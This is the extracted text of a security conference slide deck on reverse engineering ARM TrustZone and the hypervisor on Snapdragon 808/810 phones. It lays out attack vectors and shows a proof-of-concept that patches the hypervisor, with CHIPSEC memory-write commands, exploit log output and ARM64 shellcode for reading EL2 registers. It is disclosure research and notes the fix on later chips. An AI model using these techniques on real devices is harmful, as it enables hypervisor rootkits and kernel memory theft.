# **Blue Pill for Your Phone**

Oleksandr Bazhaniuk @ABazhaniuk Yuriy Bulygin @c7zero

#### Agenda

- Introduction
- Reverse engineering of ARM TrustZone and hypervisor
- Attack vectors against ARM TrustZone and hypervisor
- Exploiting Hypervisor on ARM based SoC
- Mitigations and Conclusions

#### Introduction

## Motivation

- Security research in ARM TrustZone exists but we'd like to advance research in security of virtualization on ARM
- Understand the threat model of ARM hypervisor and TrustZone
- We wanted to analyze similarities and differences in attack vectors on x86 and ARM based systems
- Example: unchecked pointer vulnerabilities were found in both ARM TrustZone and in x86 System Management Mode firmware: Exploring Qualcomm's TrustZone implementation and New Class of Vulnerabilities in SMI Handlers

## **Hypervisor Based Rootkit**



#### **Concept and Timeline**

**2006:** SubVirt: Implementing Malware with Virtual Machines by Samuel T. King et al (Microsoft Research)

**2006:** Hardware Virtualization Rootkits by Dino Dai Zovi and BluePill by Joanna Rutkowska (BHUSA 2006)

**2008:** <u>Bluepilling the Xen Hypervisor</u> by Invisible Things Labs (BHUSA 2008)

... (research in exploiting hypervisors)

**2015:** Attacking Hypervisors via Hardware and Firmware (BHUSA 2015)

#### **ARM Security Architecture Overview**



#### **ARMv7 (32bit) Privilege Levels**



## **ARMv8 Privileges Levels**



## **ARMv8 TrustZone and Hypervisor Interfaces**

| Register Name |                              | Role during SMC o                                 |          |                                 |  |  |
|---------------|------------------------------|---------------------------------------------------|----------|---------------------------------|--|--|
| SMC32         | C32 SMC64 Calling values     |                                                   | Modified | Return state                    |  |  |
| SP_ELx        |                              | ELx Stack Pointer                                 | No       |                                 |  |  |
| SP_EL0        |                              | EL0 Stack Pointer                                 | No       |                                 |  |  |
| X             | 30                           | The Link Register                                 | No       | Unchanged,                      |  |  |
| X             | 29                           | The Frame Pointer                                 | No       | Registers are<br>saved/restored |  |  |
| X19.          | X28                          | Callee-saved registers                            | No       |                                 |  |  |
| Х             | 18                           | The Platform Register                             | No       |                                 |  |  |
| Х             | 17                           | The second intra-procedure-call scratch register. | Yes      |                                 |  |  |
| Х             | 16                           | The first intra-procedure-call scratch register.  | Yes      |                                 |  |  |
| X9            | .X15                         | Temporary registers                               | Yes      | Unpredictable,                  |  |  |
| ×             | (8                           | Indirect result location register                 | Yes      | Scratch                         |  |  |
| W7            | W7                           | Hypervisor Client ID register                     | Yes      | registers                       |  |  |
| W6            | X6                           | Parameter register                                | Yes      |                                 |  |  |
|               | (or W6)                      | Optional Session ID register                      |          |                                 |  |  |
| W4W5          | 4W5 X4X5 Parameter registers |                                                   | Yes      |                                 |  |  |
| W1W3          | X1X3                         | Parameter registers                               | Yes      | SMC Result                      |  |  |
| W0            | X0                           | SMC Function ID                                   | Yes      | registers                       |  |  |

SMC Calling Convention

## **ARMv8 Paging**



PA

### **TrustZone Arch Evolution**



#### **x86 vs ARM Architecture**

|                | <b>x86</b>                                                                                                                                                                     | ARM                                                                                                                                                    |  |  |  |
|----------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------|--|--|--|
| Root of Trust  | Recently introduced Boot Guard<br>(starting Haswell gen) to provide CPU<br>based root of trust ( <u>Safeguarding</u><br><u>rootkits: Intel BootGuard</u> )                     | ARM has ROM for root of trust that<br>checks the boot sequence components.<br>May have OEM unlock mode                                                 |  |  |  |
| TEE            | Virtualization based trusted execution<br>environments. SGX provides enclave<br>execution to user-mode components.<br>SMM is also used as TEE (can be<br>virtualized with STM) | Flexible Secure World arch with<br>capabilities to run trusted apps. Allows<br>privilege level separation in the Secure<br>World context (EL0,EL1,EL3) |  |  |  |
| Virtualization | VMX technology as context switching<br>between VMX root and VMX guest<br>modes. Supports privilege level<br>separation in VMX root                                             | ARM has hyp mode as an exception<br>level                                                                                                              |  |  |  |

## **Qualcomm Snapdragon 810 boot flow stages**



#### **ARM Based System Boot Flow**

- Root of trust is in ROM at APSS/RPM
- Read-only ROM verifies RW firmware
- Uses OTP fuses to program OEM lock
  - # adb reboot bootloader
  - # sudo fastboot oem unlock
- TrustZone components (Secure World) initialize and set runtime protection before transferring execution flow to any hypervisor or OS bootloader component

## **TrustZone Binary**

- (Google phones specific) Download factory image from <u>Google repository</u>
- Use <u>unpack bootloader image</u> by <u>laginimaineb</u> to unpack bootloader-<DID>.img
- Extracted files:

aboot cmnlib hyp imgdata keymaster pmic rpm sbll sdi sec tz

• **Disassemble** tz

| $\overline{}$ | Name   | Start    | End      | R | w | х | D | L | Align   | Base | Туре   | Class | AD | Т  | DS |
|---------------|--------|----------|----------|---|---|---|---|---|---------|------|--------|-------|----|----|----|
| TZ<br>Kernel  | 🛟 LOAD | 06D00000 | 06D44640 | R |   | Х |   | L | page    | 01   | public | CODE  | 32 | 00 | 0B |
|               | LOAD   | 06D45000 | 06D46F90 | R |   | Х |   | L | mempage | 02   | public | CODE  | 32 | 00 | 0B |
| Keinei        | LOAD   | 06D47000 | 06D4722C | R |   | Х |   | L | mempage | 03   | public | CODE  | 32 | 00 | 0B |
|               | LOAD   | 06D48000 | 06D4B34C | R |   | Х |   | L | mempage | 04   | public | CODE  | 32 | 00 | 0B |
|               | LOAD   | 06D4C000 | 06D5AB20 | R |   |   |   | L | mempage | 05   | public | DATA  | 32 | 00 | 0B |
| TZ<br>Monitor | LOAD   | 06D5B000 | 06D6B75C | R | W |   |   | L | mempage | 06   | public | DATA  | 32 | 00 | 0B |
|               | LOAD   | 06D8BC00 | 06D8C000 | R | W |   |   | L | dword   | 07   | public | DATA  | 32 | 00 | 0B |
|               | LOAD   | 06D8C000 | 06D8D748 | R | W |   |   | L | byte    | 08   | public | DATA  | 32 | 00 | 0B |
|               | 😝 LOAD | 06D8E000 | 06D96000 | R | W |   |   | L | mempage | 09   | public | DATA  | 32 | 00 | 0B |
|               | LOAD   | 06D96000 | 06D9BFC0 | R |   | Х |   | L | byte    | 0A   | public | CODE  | 64 | 00 | 0B |
|               | LOAD   | 06D9C000 | 06DB30CC | R | W |   |   | L | byte    | 0B   | public | DATA  | 64 | 00 | 0B |

## **Test Environment**

- Rooting unlocked Android Phones: <u>CyanogenMod</u> <u>TWRP</u> with <u>SuperSU</u> and custom kernel
- Useful resources: <u>xda</u> , <u>Code Aurora</u>
- Tools:

<u>The Rekall Forensic and Incident Response Framework</u> <u>Maplesyrup Register Display Tool</u> <u>ARMageddon: Cache Attacks on Mobile Devices</u> <u>Drammer - for testing Android phones for the Rowhammer bug</u>

## ARM TrustZone and Hypervisor Reverse Engineering



## **Open Source TrustZone Implementations**

- ARM reference implementation - <u>ARM Trusted Firmware</u>
  - Boot Loader stage 1 (BL1) AP Trusted ROM
  - Boot Loader stage 2 (BL2) Trusted Boot Firmware
  - Boot Loader stage 3-1 (BL31) EL3 Runtime Software
  - Boot Loader stage 3-2 (BL32) Secure-EL1 Payload (optional)
  - Boot Loader stage 3-3 (BL33) Non-trusted Firmware
- <u>OP-TEE Trusted OS</u> Linux TEE using ARM TrustZone technology. Meets GlobalPlatform System Architecture spec
- Google's <u>Trusty</u> is a set of components supporting a TEE on mobile devices

```
.globl runtime exceptions
     /*
      * This macro handles Synchronous exceptions.
      * Only SMC exceptions are supported.
     .macro handle sync exception
     /* Enable the SError interrupt */
            daifclr, #DAIF ABT BIT
     msr
            x30, [sp, #CTX GPREGS OFFSET + CTX GPREG LR]
     str
            x30, esr el3
     mrs
            x30, x30, #ESR EC SHIFT, #ESR EC LENGTH
     ubfx
     /* Handle SMC exceptions separately from other synchronous exceptions */
            x30, #EC AARCH32 SMC
     cmp
            smc handler32
     b.eq
            x30, #EC AARCH64 SMC
     cmp
            smc handler64
     b.eq
     /* Other kinds of synchronous exceptions are not handled */
     no ret report unhandled exception
     .endm
      * This macro handles FIQ or IRQ interrupts i.e. EL3, S-EL1 and NS
      * interrupts.
                               /bl31/aarch64/runtime exceptions.S" [Modified] 382 lines --10%--
```

## **TrustZone Monitor Vector Table**

| Evention taken from                                                                                                             | Offset for exce          | ption type                                            |           |                                                                                                                                                              |
|---------------------------------------------------------------------------------------------------------------------------------|--------------------------|-------------------------------------------------------|-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Exception taken from                                                                                                            | Synchronous              | IRQ or vIRQ FIQ or vFIQ                               |           | SError or vSError                                                                                                                                            |
| Current Exception level with SP_EL0.                                                                                            | 0×000                    | 0x080                                                 | 0x100     | 0x180                                                                                                                                                        |
| Current Exception level with SP_ELx, x>0.                                                                                       | 0x200                    | 0x280                                                 | 0x300     | 0x380                                                                                                                                                        |
| Lower Exception level, where the implemented level immediately lower than the target level is using AArch64. <sup>a</sup>       | 0x400                    | 0x480                                                 | 0x500     | 0x580                                                                                                                                                        |
| Lower Exception level, where the implemented<br>level immediately lower than the target level is<br>using AArch32. <sup>a</sup> | 0x600                    | 0x680                                                 | 0x700     | VBAR_EL3, Vector Base Address Register (EL3) The VBAR_EL3 characteristics are: Purpose Holds the vector base address for any exception that is taken to EL3. |
| Store 6D9B800                                                                                                                   | to VBAR_EL               | _3                                                    |           | Usage constraints<br>This register is accessible as follows:<br>EL0 EL1 (NS) EL1 (S) EL2 (NS) EL3 (SCR.NS=1) EL3 (SCR.NS=1)                                  |
| 188 00 82 00 58<br>18C 00 C0 1E D5<br>190 00 38 80 D2<br>194 20 42 1B D5                                                        | LDR<br>MSR<br>Mov<br>MSR | X0, =1oc_6<br>#6, c12, c1<br>X0, #0x1C0<br>#3, c4, c2 | 0, #0, X0 |                                                                                                                                                              |

ARMv8 Architecture Reference Manual

#### **TrustZone Monitor SMC Exception Handler**





## EL1 aarch32 TrustZone Kernel

|        |                                          |                      |                       | e AArch32 vector tabl   |  |  |  |  |  |  |
|--------|------------------------------------------|----------------------|-----------------------|-------------------------|--|--|--|--|--|--|
| Offset | Vector tables                            |                      |                       |                         |  |  |  |  |  |  |
|        | Нура                                     | Monitor <sup>b</sup> | Securec               | Non-secure <sup>c</sup> |  |  |  |  |  |  |
| 0x00   | Not used                                 | Not used             | Not used <sup>d</sup> | Not used                |  |  |  |  |  |  |
| 0x04   | Undefined Instruction, from Hyp mode     | Monitor Trap         | Undefined Instruction | Undefined Instruction   |  |  |  |  |  |  |
| 0x08   | Hypervisor Call, from Hyp mode           | Secure Monitor Call  | Supervisor Call       | Supervisor Call         |  |  |  |  |  |  |
| 0x0C   | Prefetch Abort, from Hyp mode            | Prefetch Abort       | Prefetch Abort        | Prefetch Abort          |  |  |  |  |  |  |
| 0x10   | Data Abort, from Hyp mode                | Data Abort           | Data Abort            | Data Abort              |  |  |  |  |  |  |
| 0x14   | Hyp Trap, or Hyp mode entry <sup>e</sup> | Not used             | Not used              | Not used                |  |  |  |  |  |  |
| 0x18   | IRQ interrupt                            | IRQ interrupt        | IRQ interrupt         | IRQ interrupt           |  |  |  |  |  |  |
| 0x1C   | FIQ interrupt                            | FIQ interrupt        | FIQ interrupt         | FIQ interrupt           |  |  |  |  |  |  |



#### ARMv8 Architecture Reference Manual

### **Open Source TrustZone Driver**



## **SMC Handler Arguments in ARMv8 Systems**





#### **Reversing SMC Default Handler...**



## **Reversing Overlap Checks...**

```
unsigned int fastcall check buffer args with TZ addr overlap(int p buffer , int buffer , int buffer size )
 char *buffer; // r5@1
  char *pbuffer; // r6@1
  int buffer size; // r4@1
  unsigned int result; // r0@1
  char v7; // zf@2
  bool v8; // r108
  buffer = (char *)buffer ;
  pbuffer = (char *)p buffer ;
  buffer size = buffer size ;
                                                                        Check "buffer" pointer for overlapping with TZ
 result = 0xFFFFFFF;
 if ( buffer )
   v7 = pbuffer == 0:
   if ( pbuffer )
     v7 = buffer size == 0;
   if ( 107 )
     if ( check TZ addr overlap (buffer , buffer size ) && !check TZ addr overlap ((int)pbuffer, buffer size) )
       Clean_Data_Cache_Line_((int)buffer, buffer_size);
                                                                                         Copy "buffer" and check for
       memcpy(pbuffer, buffer, buffer size);
       v8 = check TZ addr overlap ((int)buffer, buffer size);
                                                                                    overlapping with TZ every DWORD
       result = 0:
                                                                                                 in the buffer
       if ( 108 )
         result = 0xFFFFFFEE;
                                                                                         (Race Condition protection)
```

#### How the check for overlap with TZ works



#### **Reversing SMC Handlers Table...**



#### **Example of SMC Handler**

}



#### **SMC Handler Communicates with Secure Device**



#### **Reversing Error Codes...**



## Hypervisor on Snapdragon 808/810

|                  |                                        |                                                                                                                                                                                                                         | VBAR_EL2                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
|------------------|----------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| loc_6C08800<br>- | I                                      | ; DATA XREF: start<br>; LOAD:off_6C00228<br>loc_6C06FA0                                                                                                                                                                 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| S<br>M<br>B      | 5TP<br>10V<br>8L                       | X30, X0, [SP,#-0x10]!<br>X0, #9<br>sub_6C00FDC<br>X30, X0, [SP],#0x10                                                                                                                                                   |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| loc_6C08890<br>B | l<br>                                  | ; CODE XREF: LOAD:<br>loc_6C08890<br>                                                                                                                                                                                   |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| S<br>M<br>B      | STP<br>IOV<br>BL                       | X30, X0, [SP,#-0x10]!<br>X0, #0xA<br>sub_6C00FDC<br>X30, X0, [SP],#0x10                                                                                                                                                 | TTBR0_EL2<br>Stage 1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             |
| loc_6C08910      |                                        | ; CODE XREF: LOAD:                                                                                                                                                                                                      | Translation table                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                |
|                  |                                        | MOV X0, #0x6C40000<br>B <mark>loc_6C071E4</mark>                                                                                                                                                                        |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
|                  | MSR<br>LDR<br>MSR<br>LDR<br>MSR<br>RET | ; CODE XREF:<br>#4, c2, c0, #0, X0<br>X0, =0xBB04FF44<br>#4, c10, c2, #0, X0<br>X0, =0x80803A20<br>#4, c2, c0, #2, X0<br>NK FOR sub 6C014E0                                                                             |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
|                  |                                        | B<br>ALIGN 0x80<br>STP<br>MOU<br>BL<br>LDP<br>10c_6C08890<br>B<br>ALIGN 0x80<br>STP<br>MOU<br>BL<br>LDP<br>10c_6C08910<br>ALIGN 0x80<br>STP<br>MOU<br>BL<br>LDP<br>10c_6C08910<br>ALIGN 0x80<br>STP<br>MOU<br>BL<br>LDP | ; LOAD:off_6C00228<br>B loc_6C00FA0<br>s; ALIGN 0x80<br>STP X30, X0, [SP,#-0x10]!<br>MOU X0, #9<br>BL sub_6C00FDC<br>LDP X30, X0, [SP],#0x10<br>loc_6C008890 ; CODE XREF: LOAD:<br>B loc_6C008890 ;<br>s; ALIGN 0x80<br>STP X30, X0, [SP,#-0x10]!<br>MOU X0, #0xA<br>BL sub_6C00FDC<br>LDP X30, X0, [SP],#0x10<br>loc_6C08910 ; CODE XREF: LOAD:<br>MOU X0, #0xA<br>BL sub_6C00FDC<br>LDP X30, X0, [SP],#0x10<br>loc_6C08910 ; CODE XREF: LOAD:<br>MOU X0, #0x6C40000<br>B loc_6C071E4 ; CODE XREF: LOAD:<br>MOU X0, #0x6C400000<br>B loc_6C071E4 ; CODE XREF: LOAD:<br>MOU X0, #0x6C4000000<br>B loc_6C071E4 ; CODE XREF: LOAD:<br>MOU X0, #0x6C4000000<br>R loc AC071E4 ; CODE XREF: LOAD:<br>MOU X0, #0x6C4000000<br>R loc AC071E4 ; CODE XREF: LOAD:<br>K0 R R R R R R R R R R R R R R R R R R |

#### ARM TrustZone and Hypervisor Attack Vectors



#### **Attack Vectors**



Additional reading: awesome work on exploiting TrustZone by Gal Beniamini of P0 [1], [2], [3], [4]

# Exploring Device MMIO Ranges...

Things we look for in MMIO:

- Registers accessible from different privilege levels
- Registers accessible at Boot vs Run time
- Addresses/pointers in registers

Methods to test MMIO registers:

- Every register in a specific device
- Every page in entire MMIO range
- Non-zero registers

#### MMIO:

Nexus 5x/6p: 0xf9000000 - 0xfffffff Google Pixel: 0x0000000 - 0x7fffffff

|             | f9017000-f9017fff                      | : | msm-watchdog                                 |
|-------------|----------------------------------------|---|----------------------------------------------|
| 200         | f9100000-f9100fff                      | : | cci                                          |
| nges        | f920c100-f92fbfff<br>f9824900-f9824a9f | ÷ | f9200000.dwc3<br>mmc0                        |
| U           | f991e000-f991efff                      | : | msm serial hsl                               |
|             | f9924000-f9924fff                      | 1 | f9924000.i2c                                 |
|             | f9928000-f9928fff                      | 1 | f9928000.i2c                                 |
|             | f9963000-f9963fff                      | ; | spi qsd                                      |
| evels       | f9965000-f9965fff                      | ÷ | f9965000.i2c                                 |
|             | f9966000-f9966fff                      | : | spi qsd                                      |
|             | f9967000-f9967fff                      | : | f9967000.i2c                                 |
|             | f9b38000-f9b387ff                      | : | qmp phy base                                 |
|             | f9b3e000-f9b3e3fe                      | : | qmp ahb2phy base                             |
|             | fc401680-fc401683                      | : | restart reg                                  |
|             | fc4281d0-fc4291cf                      | : | vmpm                                         |
|             | fc4a8000-fc4a9fff                      | : | tsens_physical                               |
| /proc/iomem | fc4ab000-fc4ab003                      | : | /soc/restart@fc4ab000                        |
|             | fc4bc000-fc4bcfff                      | : | tsens_eeprom_physical                        |
|             | fc820000-fc82001f                      | : | rmb_base                                     |
|             | fc880000-fc8800ff                      | : | qdsp6_base                                   |
|             | fda00020-fda0002f                      | : | csi_clk_mux                                  |
|             | fda00030-fda00033                      | : | csiphy_clk_mux                               |
|             | fda00038-fda0003b                      | : | csiphy_clk_mux                               |
|             | fda00040-fda00043                      | : | csiphy_clk_mux                               |
|             | fda04000-fda040ff                      | : | fda04000.qcom,cpp                            |
|             | fda08000-fda083ff                      | : | fda08000.qcom,csid                           |
|             | fda08400-fda087ff                      | ÷ | fda08400.qcom,csid                           |
|             | fda08800-fda08bff                      | ÷ | fda08800.qcom,csid                           |
|             | fda08c00-fda08cff<br>fda0a000-fda0a4ff |   | fda08c00.qcom,csid                           |
|             | fda0ac00-fda0adff                      |   | fda0a000.qcom,ispif                          |
|             | fda0b000-fda0b1ff                      | 1 | fda0ac00.qcom,csiphy<br>fda0b000.qcom,csiphy |
|             | fda0b400-fda0b5ff                      | 1 | fda0b400.qcom,csiphy                         |
| ſ           | fda0c000-fda0cfff                      | 1 | fda0c000.qcom,cci                            |
|             | fdb00000-fdb3ffff                      | 1 | kgsl-3d0                                     |
|             | fec00000-fecffff                       | : | fdd00000.qcom,ocmem                          |
|             | ff400000-ff5fffff                      |   | ath                                          |
|             |                                        |   | Set set 1                                    |

# **Overlapping SoC Ranges with TrustZone Memory**

- MMIO and core registers may contain addresses to SoC or core ranges/structures
- Example: Debug Buffer, TTBR...
- Overlap range/structure with TrustZone memory and look for unexpected behavior
- Hardware should properly handle overlap condition



#### **DMA Attacks**



#### **Pointer Arguments to SMC Handlers**



Some SMC Handlers write result to a buffer at address passed in X2,...

#### **Unchecked Pointer Vulnerabilities**



If SMC handler doesn't validate pointer, it can overwrite TrustZone memory Examples: <u>Full TrustZone exploit for MSM8974</u>, SMC vulns by Dan Rosenberg

#### **SMC Pointer Vulnerabilities Fuzzer**



# **Race Condition Issues (TOCTOU)**



SMC handlers may have TOCTOU issues when reading structures from X2

## **Unchecked Addresses to MMIO Ranges**



An address to MMIO of a secure device can be passed to SMC handler. If the handler doesn't validate the address it can be tricked to write to the secure device

## **Unchecked MMIO Pointer Fuzzer for TZ**





#### Now let's find the hypervisor...

root@angler:/sdcard/chipsec/t3 # python chipsec\_util.py mem read 0x6C03E00

```
##
                                                 ##
   CHIPSEC: Platform Hardware Security Assessment Framework
##
                                                 ##
##
                                                 ##
[CHIPSEC] Version 1.2.2
****** Chipsec Linux Kernel module is licensed under GPL 2.0
[CHIPSEC] Executing command 'mem' with args ['read', '0x6C03E00']
femilesec1 reading buffer from memory: PA = 0x000000006C03E00, len = 0x100...
FF FF FF FF 00 00 00 00 18 08 c0 06 00 00 00 0
18 08 c0 06 00 00 00 00 6c 08 c0 06 00 00 00 0
                                              1
7c 08 c0 06 00 00 00 18 08 c0 06 00 00 00 | |
```

Read hypervisor memory

# What if we point SMC to the hypervisor memory?





# Modifying Hypervisor on Snapdragon 808...

- We find hypervisor binary in memory. Must be a copy?
- Let's try to modify it. The phone reboots! WTF?
- Assumption: stage 2 translation is disabled?

```
[CHIPSEC] reading buffer from memory: PA = 0x00000000006C0000^
44 11 00 58 04 c0 1c d5 20 40 1c d5 a3 00 3c d5
                                                            ([CHIPSEC] Executing command 'mem' with args ['writeval', '0x6C00000', 'dword', '0xFFFFFFF'
64 1c 78 92 63 1c 40 92 63 18 44 aa a4 10 00 58
                                                   dxc@c
00 00 82 d2 00 7c 03 9b 9f 60 20 cb f4 4f bf a9
                                                             [CHIPSEC] writing 4-byte value 0xFFFFFFFF to PA 0x000000006C00000..
                                                             [CHIPSEC] (mem) time elapsed 0.001
f3 03 03 aa e2 07 bf a9 a0 00 3c d5 02 1c 78
                                                             root@bullhead:/sdcard/t3 # python chipsec util.py mem read 0x6C00000
00 1c 40 92 00 18 42 aa d1 03 00 94 a0 00 3c
                                                     0
f7 0b 00 94 1f 00 00 f1 e0 01 00 54 20 40
a0 00 3c d5 01 1c 78 92 00 1c 40 92 00 18 41 aa
                                                     <
                                                         X
01 00 80 d2 79 0e 00 94 a0 00 3c d5 20 0c 00 94
                                                       V
                                                                CHIPSEC: Platform Hardware Security Assessment Framework
1f 00 00 f1 80 00 00 54 e1 03 00 aa e2 7f c1 a8
02 00 00 14 e2 07 c1 a8 f4 03 02 aa 60 00
                                          80 d2
                                                             00 el lc d5 e0 03 lf aa 60 e0 lc d5 60 ll lc d5
                                                              CHIPSEC] Version 1.2.2
e0 7f 86 d2 40 11 1c d5 3f 04 00 f1 c0 00
                                                       (d
3f 08 00 f1 40 00 00 54 00 00 00
                                 14
                                    04
                                                       0
                                                             ****** Chipsec Linux Kernel module is licensed under GPL 2.0
05 00 00 14 00 10 38 d5 00 00 7b b2 00 10 18 d5
                                                         8
e4 03 1f aa 04 11 1c d5 9f 00 61 f2 01 01 00 54
                                                             [CHIPSEC] Executing command 'mem' with args ['read', '0x6C00000']
20 40 3c d5 1f 00 40 f2 61 00 00 54 60 12 80 d2
                                                    0<
                                                         0 a
                                                             [CHIPSEC] reading buffer from memory: PA = 0x000000006C00000
                                                                                                                        len = 0 \times 100..
[CHIPSEC] (mem) time elapsed 0.014
                                                             ff ff ff ff 04 c0 1c d5 20 40 1c d5 a3 00 3c d5
root@bullhead:/sdcard/t3 #
                                                                     92 63 1c 40 92 63 18 44 aa a4 10 00 58
                                                                                                            dxc
                                                            00 00 82 d2 00 7c 03 9b 9f 60 20 cb f4 4f bf a9
                                                                                                                        0
                                                             f3 03 03 aa e2 07 bf a9 a0 00 3c d5 02 1c 78 92
                                                            00 lc 40 92 00 18 42 aa dl 03 00 94 a0 00 3c d5
```

#### Now we can patch the hypervisor...



#### **Patching EL2 Vector Table**



## **PoC Exploit App and Hypervisor Patch**

- Exploit app stores some magic number and command in a memory
- Hypervisor rootkit read magic number and executes command
- For example, command "Expose EL1 kernel memory at address X"

#### **Exploit Details**

bullhead:/ # /su/expl.sh chipsec 6843 0 [CHIPSEC] OS : Linux 3.10.73-gb1bd207-dirty #1 SMP PREEMPT Mon Jun 26 16:11:07 PDT [CHIPSEC] Platform: aarch64

[+] loaded chipsec.modules.tools.hyp.hyp\_exploit

[Exploit] EL1 kernel module has access to Hypervisor memory

[Exploit] Read VBAR\_EL2 with address of Hyp Vector Table : 0x06C08800 [Exploit] Find a Exception Handler function in which exploit will inject Shellcode [Exploit] Target Function Address : 0x06C017FC

[Exploit] Prepare Shellcode with Commands : Read/Write EL1 Kernel memory
[Exploit] Inject Shellcode to Target Function in address : 0x06C019F8
[Exploit] Check Shellcode after injection : PASS

#### **Exploit Details**

bullhead:/ # /su/chipsec util.sh mem read 0x80000 chipsec 6843 0 10 00 00 14 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 52 4d 64 00 00 ARMd 00 00 f5 03 00 aa ef ff 05 94 71 00 06 94 15 00 06 94 q 16 00 38 d5 e0 03 16 aa 7a 00 06 94 f7 03 8 Ζ 00 aa G ; X 17 01 00 b4 20 00 00 94 47 00 00 94 3b 05 00 58 9e 02 00 10 ec 0a 40 f9 8c 01 1c 8b 80 01 1f d6 (d 1f 20 03 d5 ff ff ff 17 1f 20 03 d5 20 03 1f 20 03 d5 1f 20 03 d5 1f d5 20 03 d5 c5 10 00 58 05 c0 18 d5 19 20 18 20 Х d5 Зa 18 d5 df 3f 03 d5 01 00 00 14 00 10 18 d5 ? df 3f 03 d5 60 03 1f d6 bf 0a 40 f2 01 01 00 54 bf 02 18 eb (d cb 00 00 54 00 00 a4 d2 00 00 18 8b bf 02 00 eb [CHIPSEC] (mem) time elapsed 0.003

bullhead:/ # [APP] Got signal from the Hypervisor! [APP] Hooked interrupt executed [APP] Address in Android kernel to read through [APP] hooked Hypervisor interrupt is: 0x80000 [APP] Kernel Memory Dump: 00 00 00 00 00 00 00 00 00 00 00 00 00 41 52 4D 64 00 00 00 00 F5 03 00 AA EF FF 05 94 71 00 06 94 15 00 06 94 16 00 38 D5 E0 03 16 AA 7A 00 06 94 F7 03 17 01 00 B4 20 00 00 94 47 00 00 94 40 F9 9E 02 00 10 EC 0A 8C 01 1 C 8B 80 01 1F 20 03 D5 FF FF FF 17 1F 20 03 D5 C5 10 00 58 05 C0 18 D5 19 20 18 D5 3A 20 18 D5 DF 3F 03 D5 01 00 00 14 00 10 18 D5 DF 3F 03 D5 60 03 1F D6 BF 0A 40 F2 01 01 00 54 BF 02 18 EB CB 00 00 54 00 00 A4 D2 00 00 18 8B BF 02 00 EB

User mode application can read EL2 kernel memory from 0x80000 physical address using our hyp patch



#### This has been fixed in Google Pixel

- The trust model has changed on Snapdragon 821 SoC
- EL1 (kernel) is not longer in the TCB of EL2 (hypervisor)
- Hypervisor is no longer accessible from Android kernel (EL1)

```
python chipsec_util.py mem read 0x85810000
##
                                                ##
   CHIPSEC: Platform Hardware Security Assessment Framework
##
                                                ##
##
                                                ##
[CHIPSEC] Version 1.2.2
****** Chipsec Linux Kernel module is licensed under GPL 2.0
[CHIPSEC] Executing command 'mem' with args ['read', '0x85810000']
[CHIPSEC] reading buffer from memory: PA = 0 \times 0000000085810000, len = 0 \times 100.
user@kli:~$ adb shell
```

<

## **Cannot use SMC handler either**

- Passing hypervisor address in the SMC argument
- Return error result
- SMC does not allow overwriting hypervisor memory on behalf of EL1

## Conclusion

- Hypervisor can be attacked on ARM based systems with Snapdragon 808/810 and virtualization rootkit can be installed
- Threat model should not include OS kernel into the TCB of the hypervisor
- Similarities between vectors of attacks on x86 and ARM exist and security architectures can learn from each other

# **Thank You!**

# BACKUP

## **Hypervisor Payload Customization**

Read HCR\_EL2 register:

import pwnlib
shellcode = """ STR X0, [sp, #-16]!;
 STR X1, [sp, #-16]!;
 MRS X0, HCR\_EL2;
 MRS X1, TTBR0\_EL2;
 ADD X1, X1, #0x200;
 STR x0, [x1]; // store value to commutation buffer (TTBR0\_EL2 + 0x200)
 LDR X1, [sp], #16;
 LDR X0, [sp], #16;
 RET """

shellcode bin = pwnlib.asm.asm(shellcode, arch = 'arm64')

#### Other examples:

>>> binascii.hexlify(pwnlib.asm.asm("MRS X0, VBAR\_EL2; RET",arch = 'arm64')) '00c03cd5c0035fd6' >>> pwnlib.asm.disasm(binascii.unhexlify("00c03cd5c0035fd6"), arch = 'arm64') ' 0: d53cc000 mrs x0, vbar el2\n 4: d65f03c0 ret'

## **Reading EL2 Registers...**

